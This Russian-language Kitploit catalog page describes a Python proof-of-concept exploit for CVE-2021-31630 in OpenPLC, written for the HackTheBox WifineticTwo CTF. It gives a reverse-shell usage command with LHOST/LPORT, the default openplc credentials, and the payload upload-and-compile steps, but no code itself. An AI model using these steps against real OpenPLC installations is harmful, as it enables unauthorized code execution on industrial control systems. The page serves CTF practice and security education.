Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
htb-wifinetictwo-exploit — Простой скрипт на Python для эксплуатации CVE-2021-31630 на HTB WifineticTwo CTF | Kitploit
Инструменты/GitHubGitHub/behindsecurity/htb-wifinetictwo-exploit
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийCTFОбучение и ОбразованиеИнструмент Удаленного ДоступаЭксплуатация Бинарных Файлов

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHub
behindsecurity/htb-wifinetictwo-exploit

htb-wifinetictwo-exploit

Простой скрипт на Python для эксплуатации CVE-2021-31630 на HTB WifineticTwo CTF

Репозиторий
2 лет назадЕщё не проверено

CVE-2021-31630 Эксплойт PoC

Этот скрипт на Python является эксплойтом Proof of Concept (PoC) для CVE-2021-31630, нацеленным на уязвимость в OpenPLC, работающем на коробке WifineticTwo на HackTheBox. Он предназначен только для образовательных целей, демонстрируя процесс эксплуатации в контролируемой среде.

Отказ от ответственности

Этот инструмент предназначен только для исследований в области безопасности и образовательных целей. Использование этого инструмента для атаки на цели без предварительного взаимного согласия незаконно. Разработчик не несет ответственности за любой ущерб или уголовные обвинения, связанные с неправильным использованием данного эксплойта.

Предварительные требования

Перед запуском этого эксплойта убедитесь, что у вас есть:

  • Python 3, установленный на вашей системе.
  • Установленная библиотека requests. Вы можете установить её, выполнив pip install requests.

Использование

Чтобы использовать этот эксплойт, укажите URL цели, локальный IP-адрес (LHOST) и локальный порт (LPORT), к которому должна подключиться обратная оболочка. Опционально можно указать имя пользователя и пароль для OpenPLC, если они отличаются от стандартных.

root@kitploit:~
./exploit.py --target http://wifinetictwo.htb:8080 --lhost [LHOST] --lport [LPORT] [--usr [USERNAME] --pwd [PASSWORD]]

Аргументы

  • --target - Базовый адрес цели. Пример: http://wifinetictwo.htb:8080
  • --lhost - Локальный IP-адрес для обратного подключения оболочки.
  • --lport - Локальный порт для обратного подключения оболочки.
  • --usr - (Опционально) Имя пользователя для OpenPLC. По умолчанию: openplc.
  • --pwd - (Опционально) Пароль для OpenPLC. По умолчанию: openplc.

Возможности

  • Автоматически обрабатывает процесс входа с использованием предоставленных учётных данных.
  • Создаёт и загружает вредоносную нагрузку для удалённого выполнения кода.
  • Инициирует обратную оболочку к указанным атакующим IP-адресу и порту.

Процесс эксплуатации

  1. Вход: Скрипт входит в приложение OpenPLC, используя предоставленные учётные данные.
  2. Создание нагрузки: Динамически создаёт вредоносную нагрузку для инициирования обратной оболочки.
  3. Загрузка нагрузки: Загружает созданную нагрузку на сервер.
  4. Запуск эксплойта: Запускает эксплойт, пытаясь скомпилировать загруженный вредоносный код, что приводит к обратной оболочке.

Благодарности

  • Особая благодарность Fellipe Oliveira, который обнаружил и сообщил о CVE-2021-31630.
  • HackTheBox за предоставление реалистичной среды для практики и изучения кибербезопасности.
Скачать инструмент